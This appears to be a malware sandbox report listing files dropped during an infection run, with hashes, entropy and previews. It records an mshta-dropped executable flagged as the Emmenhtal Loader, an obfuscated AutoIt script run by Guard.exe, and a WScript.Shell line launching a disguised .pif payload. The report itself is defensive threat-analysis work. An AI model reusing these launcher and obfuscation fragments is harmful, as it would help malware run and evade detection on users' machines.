                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):282
                                                                        Entropy (8bit):5.2766403551917564
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HX7DTJPKvB3/dVlPIHAR0YvFUuqoAvJTqgFCrPeUkwRe9:YvXKX7PJSvR/ZwHAz9GTq16Ukee9
                                                                        MD5:27418CF6C47F76113E01246E6617A153
                                                                        SHA1:C93F5AA5D0318D8E5324089CD491943F381DA646
                                                                        SHA-256:C5735D875DD4103544BBE6E0D796C679DC601D4C14297480DA3B951DD6291E80
                                                                        SHA-512:77875B549C1980F29B3F9231C255B7E500D2E4B3A42F225CE3F9D2C9637CA7FDC68A2B10019EE5D78534DD1E7CB4B2721AB708220322EE089337093D1186DB93
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):4
                                                                        Entropy (8bit):0.8112781244591328
                                                                        Encrypted:false
                                                                        SSDEEP:3:e:e
                                                                        MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                        SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                        SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                        SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                        Malicious:false
                                                                        Preview:....
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):2814
                                                                        Entropy (8bit):5.142761468949437
                                                                        Encrypted:false
                                                                        SSDEEP:24:YQtaz4Tsayti8VzZjj4/BRX7iJJaDj8yj0S9Fpyl2M2LSXCVe/GeUE3/dT25Nscg:YBAMng/B78E/kVJimGeUmEjSz9qq3l
                                                                        MD5:2B9A02835241E8445BACA3130C0FB651
                                                                        SHA1:17FCA704817D46C2FF4757CDC5C2A58FE279512C
                                                                        SHA-256:5CF63D337B9D249DC590BCFBC7206A745EAFCD29D11F043A817B9F8410BA8EC6
                                                                        SHA-512:D28FFDD50BABA2EB6EC8B4863DE7DBDEE02CF65DB09F67B539553A4411DBE99761526D85D4D18E9C2F086AFD3CF14817C9B0817FA7C4C881E1E7852CD98D3C8E
                                                                        Malicious:false
                                                                        Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"063ec1aa6d5fa01681a1c3c7c3efbba0","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1735286736000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"5034ffefe015f2b40928a38514e21890","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1735286736000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"db91b9e0b3e9ad3a522e3e1ebe0ac44b","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1735286736000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"15e1712842ac0b548578ffde1ca3b6bd","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1735286736000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"104350db842931c85749ac6c799cf791","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1735286736000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"9ab8192a0c1c178a12636aad1eb2e8fd","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                        Category:dropped
                                                                        Size (bytes):12288
                                                                        Entropy (8bit):1.3175872268648143
                                                                        Encrypted:false
                                                                        SSDEEP:24:TLKufx/XYKQvGJF7urs9Ohn07oz7oF0Hl0FopUEiP66UEiPbnPnNknNMe/SN/tqI:TGufl2GL7ms9WR1CPmPbPah41ypilI+N
                                                                        MD5:9B99915D9E161A81C58F0A9E808C60D1
                                                                        SHA1:A5077184C0D5A012DFBBA476EE016C51F4B3D848
                                                                        SHA-256:2481A3CF4672AB9DE2F6B13793DA244F3E3B3C2CDD9A3AB63168A219DC83D913
                                                                        SHA-512:C87474FB1192A070D6BFAC5610CF52E046A9ACB6046BEFF83140F196C439BE3F32ABE2E0BDEF99A80D8ABF753FD3ECA6DF0918FBE6A022A8A2D752CF22CBB9D3
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:SQLite Rollback Journal
                                                                        Category:dropped
                                                                        Size (bytes):8720
                                                                        Entropy (8bit):1.7801031984412063
                                                                        Encrypted:false
                                                                        SSDEEP:48:7MNWR1CPmPbPah4wypilIEqFl2GL7msqB:7wWfMwbPah4wRKVmsqB
                                                                        MD5:02804CA2470044375D7DD7A3698D1F0E
                                                                        SHA1:DF5677B464B3745A471853F89E56AAFB117E1181
                                                                        SHA-256:67095B857534BC8BBFD0EDCB7AC5AADFE4EA14498E8ED6A213B25FF073FBAEEB
                                                                        SHA-512:FA8AAC373ACAF98D975ABB2722C6EC5DDD04B58F9294888CD63C946EA241C03FBB006C6D65A76959D6977E3D2DC9CB0773B796EE52D4578E2250411E6E484B4C
                                                                        Malicious:false
                                                                        Preview:.... .c....../...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^.p.p.p.p.p.p.p.p.p.p..........................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):66726
                                                                        Entropy (8bit):5.392739213842091
                                                                        Encrypted:false
                                                                        SSDEEP:768:RNOpblrU6TBH44ADKZEgeQW/SLLLfJVTGtdiA3VQQnVWI+dq6Yyu:6a6TZ44ADEo/SLLLfJ6dz3VRgq6K
                                                                        MD5:D19B2BFF329761594D580F23F42647B7
                                                                        SHA1:E49BEE537CF370D384F8113D8CEF462864043641
                                                                        SHA-256:FFFDE060082820002FF8627C44823C6EFBF6F90DD15196BBB48378C4252AA685
                                                                        SHA-512:87B3001F1DC31175A9394473FC926B994CF123321C30EC0809003FEF4EBCD27C04C741D2ECC7A814CBD583FB8D6E7D961B4A3B82FF9724F1C4208C7041C1D585
                                                                        Malicious:false
                                                                        Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                        Process:C:\Windows\System32\mshta.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):441463
                                                                        Entropy (8bit):6.364890576549753
                                                                        Encrypted:false
                                                                        SSDEEP:6144:IhaNDyEJXsEy62haNDyEJXsEy6fhaNDyEJXsEy6VhaNDyEJXsEy64haNDyEJXsEV:Hj186Nj186Oj186Uj186Xj186Z
                                                                        MD5:AEDD426C8C15EA3B78206A4BDDA8BC8F
                                                                        SHA1:0F4DE775E0E447B6492C5482FD1A500C9BA01742
                                                                        SHA-256:B01B095131B661996AD3F97DB0FD9C57FE3174C59ED08645406403F76F7EF6FD
                                                                        SHA-512:4971F47BFCD1EFEBB6A2D2E5D7FCFBD41ACAABF271A74A0925870517BCED412EF49E3D4675AE6806F8D023605E07EBF148B5A2C7D02629C54A5D5E817C23707E
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: emmenhtal_strings_hta_exe, Description: Emmenhtal Loader string, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ghep2412_2[1], Author: Sekoia.io
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 37%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(.z.{.z.{.z.{...z.z.{...z.z.{...z.z.{...z.z.{.z.{.{.{...z.z.{...{.z.{...z.z.{Rich.z.{........................PE..L............................T......P.............@..........................p......&.....@...... ..........................P...,....P..(....................`.......1..T...............................................L.......@....................text............................... ..`.data...|...........................@....idata..D).......*..................@..@.didat.......@.......$..............@....rsrc...(....P.......&..............@..@.reloc.......`.......2..............@..B................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):64
                                                                        Entropy (8bit):0.34726597513537405
                                                                        Encrypted:false
                                                                        SSDEEP:3:Nlll:Nll
                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                        Malicious:false
                                                                        Preview:@...e...........................................................
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):246
                                                                        Entropy (8bit):3.5213298467083405
                                                                        Encrypted:false
                                                                        SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K87gwlNWRl:Qw946cPbiOxDlbYnuRK9wfWj
                                                                        MD5:7AC4FB4C10248221E10340E7E84D1C36
                                                                        SHA1:97F4C59121CE36A18536F570CCB4462BFC5A6118
                                                                        SHA-256:8AE276CDE34D931D964724A74CA721A60907B110BFFA933BB369E24F88E1B44B
                                                                        SHA-512:A5EC30377F122CC5EE9E49E5C7133DD25E4291DA2C28BB18B0C1441A2EA950F0CEE401F05C6EBE95221DB83A7563CF5B1F0FC1B5DDEED10CE77B22643F93FF68
                                                                        Malicious:false
                                                                        Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.7./.1.2./.2.0.2.4. . .0.3.:.0.5.:.3.4. .=.=.=.....
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:ASCII text, with very long lines (393)
                                                                        Category:dropped
                                                                        Size (bytes):16525
                                                                        Entropy (8bit):5.33860678500249
                                                                        Encrypted:false
                                                                        SSDEEP:384:IC2heaVGJMUPhP80d0Wc+9eG/CCihFomva7RVRkfKhZmWWyC7rjgNgXo6ge5iaW0:X8B
                                                                        MD5:C3FEDB046D1699616E22C50131AAF109
                                                                        SHA1:C9EEA5A1A16BD2CD8154E8C308C8A336E990CA8D
                                                                        SHA-256:EA948BAC75D609B74084113392C9F0615D447B7F4AACA78D818205503EACC3FD
                                                                        SHA-512:845CDB5166B35B39215A051144452BEF9161FFD735B3F8BD232FB9A7588BA016F7939D91B62E27D6728686DFA181EFC3F3CC9954B2EDAB7FC73FCCE850915185
                                                                        Malicious:false
                                                                        Preview:SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:080+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):15114
                                                                        Entropy (8bit):5.361265441015613
                                                                        Encrypted:false
                                                                        SSDEEP:384:AfFmtTIbrg9iw/+33FHaekZXjMsfRN5etqZDNpDSbQ108awqqFJ3IXItEnlFN2Od:wjR
                                                                        MD5:3C4A290233F518DAEE313213D7EE3D9D
                                                                        SHA1:1F684E690A91619BAB0027713AED83CB667FD854
                                                                        SHA-256:CAE22C2CD3DB9D8F8D4789D04C8B393A2C01BB02288A34C18B4104B12C51BDC4
                                                                        SHA-512:7D0AAF5E1D5AE633B05B4AB593227FB99C4A4796852B0A7B5E1DD648948FF69C4D62F93747017B6DA75A9D0C6CF8AD6932D1BD7FE499DEC1EB5CEE2F211859C0
                                                                        Malicious:false
                                                                        Preview:SessionID=b2ba6e85-bbd6-4d78-81e7-c3f9242ac243.1735286728413 Timestamp=2024-12-27T03:05:28:413-0500 ThreadID=7988 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=b2ba6e85-bbd6-4d78-81e7-c3f9242ac243.1735286728413 Timestamp=2024-12-27T03:05:28:415-0500 ThreadID=7988 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=b2ba6e85-bbd6-4d78-81e7-c3f9242ac243.1735286728413 Timestamp=2024-12-27T03:05:28:415-0500 ThreadID=7988 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=b2ba6e85-bbd6-4d78-81e7-c3f9242ac243.1735286728413 Timestamp=2024-12-27T03:05:28:415-0500 ThreadID=7988 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=b2ba6e85-bbd6-4d78-81e7-c3f9242ac243.1735286728413 Timestamp=2024-12-27T03:05:28:415-0500 ThreadID=7988 Component=ngl-lib_NglAppLib Description="SetConf
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):29752
                                                                        Entropy (8bit):5.407436513805711
                                                                        Encrypted:false
                                                                        SSDEEP:192:TcbeIewcbVcbqI4ucbrcbQIrJcb6cbCIC4cbLfcbqIGccb5:ceo4+rsCGG7
                                                                        MD5:7580D4FF231542CDDD0751F093D7298D
                                                                        SHA1:108CF3AF4430A3FC279AF2E0B24E2FB9F6AE8759
                                                                        SHA-256:5A9F915EEDC44F8D0271F8BF7FD355C51B7386FD0947E70B49430E2DF37D1BB2
                                                                        SHA-512:C0CF60FE7E7DF49C9C5CD544302D879BC83CE33FC634197722897EA3D9A6C1EB2BC08F0A4EE3E774EBC3D5ADBD732D3DCF4FB4DF402472467AF0A7DEDB6AB8B3
                                                                        Malicious:false
                                                                        Preview:05-10-2023 10:18:29:.---2---..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 10:18:29:.Closing File..05-10-
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                        Category:dropped
                                                                        Size (bytes):758601
                                                                        Entropy (8bit):7.98639316555857
                                                                        Encrypted:false
                                                                        SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                        MD5:3A49135134665364308390AC398006F1
                                                                        SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                        SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                        SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                        Malicious:false
                                                                        Preview:(gzip compressed binary data; raw dump omitted)
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                        Category:dropped
                                                                        Size (bytes):386528
                                                                        Entropy (8bit):7.9736851559892425
                                                                        Encrypted:false
                                                                        SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                        MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                        SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                        SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                        SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                        Malicious:false
                                                                        Preview:(gzip compressed binary data; raw dump omitted)
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                        Category:dropped
                                                                        Size (bytes):1419751
                                                                        Entropy (8bit):7.976496077007677
                                                                        Encrypted:false
                                                                        SSDEEP:24576:/xA7owWLkwYIGNPMGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLkwZGuGZn3mlind9i4ufFXpAXkru
                                                                        MD5:CA6B0D9F8DDC295DACE8157B69CA7CF6
                                                                        SHA1:6299B4A49AB28786E7BF75E1481D8011E6022AF4
                                                                        SHA-256:A933C727CE6547310A0D7DAD8704B0F16DB90E024218ACE2C39E46B8329409C7
                                                                        SHA-512:9F150CDA866D433BD595F23124E369D2B797A0CA76A69BA98D30DF462F0A95D13E3B0834887B5CD2A032A55161A0DC8BB30C16AA89663939D6DCF83FAC056D34
                                                                        Malicious:false
                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                        Category:dropped
                                                                        Size (bytes):1407294
                                                                        Entropy (8bit):7.97605879016224
                                                                        Encrypted:false
                                                                        SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                        MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                        SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                        SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                        SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                        Malicious:false
                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                        Process:C:\Users\Public\Guard.exe
                                                                        File Type:ASCII text, with very long lines (1266)
                                                                        Category:dropped
                                                                        Size (bytes):1149412
                                                                        Entropy (8bit):5.199720915817413
                                                                        Encrypted:false
                                                                        SSDEEP:12288:D8V+jcfSw6xHpcFTkUCroPzZsc2gmjoiVRS9CyaQZflhM8smx8/d:DcLkpcpLCrOzZTob5JAli1
                                                                        MD5:871CCC978BDD281E863F3495FD632585
                                                                        SHA1:A411AD4AA70904C07791EB70E98B63DCFD862711
                                                                        SHA-256:3A08EBD5BEC10B61C51F4D647A7CFCA5F6197DF364E79F8450AF8E4502F1283B
                                                                        SHA-512:094100D8A711F5386FF90734DDFA66CDE270CACF9E6E49438E13C4EFE92EF1A535ABEC200B05C2A1EB49DA6FF79CDF89036C971747D6C0E9E80078A51FF715A8
                                                                        Malicious:false
                                                                        Preview:Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]
                                                                        Process:C:\Users\Public\Guard.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):186
                                                                        Entropy (8bit):4.761058342183721
                                                                        Encrypted:false
                                                                        SSDEEP:3:RiMIpGXfeNH5E5wWAX+TSyCVVh4EkD5yKXW/Zi+0/RaMl85uWAX+TSyCVVh4EkDO:RiJbNHCwWDmLJkDrXW/Zz0tl8wWDmLJX
                                                                        MD5:6B09F9AC501B58CCD5BC08B41FF85624
                                                                        SHA1:95272508F2347856331B1017A86F63B5F87FCD68
                                                                        SHA-256:D5F306EB2125F34C25704C8B9611AA1367A772EF02D7BAA1789D8C7026D17BE6
                                                                        SHA-512:721BD6DA01A3DC639958E2D801C1A10B7E0B9D4363B4182219BD6261737D67B172236DC2C651DC753DC91DE6CEB94B74977E8EF1578A262EF5D27A6DC2F428D2
                                                                        Malicious:true
                                                                        Preview:new ActiveXObject("Wscript.Shell").Run("\"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\SwiftWrite.pif\" \"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\G\"")
                                                                        Process:C:\Users\Public\Guard.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):893608
                                                                        Entropy (8bit):6.62028134425878
                                                                        Encrypted:false
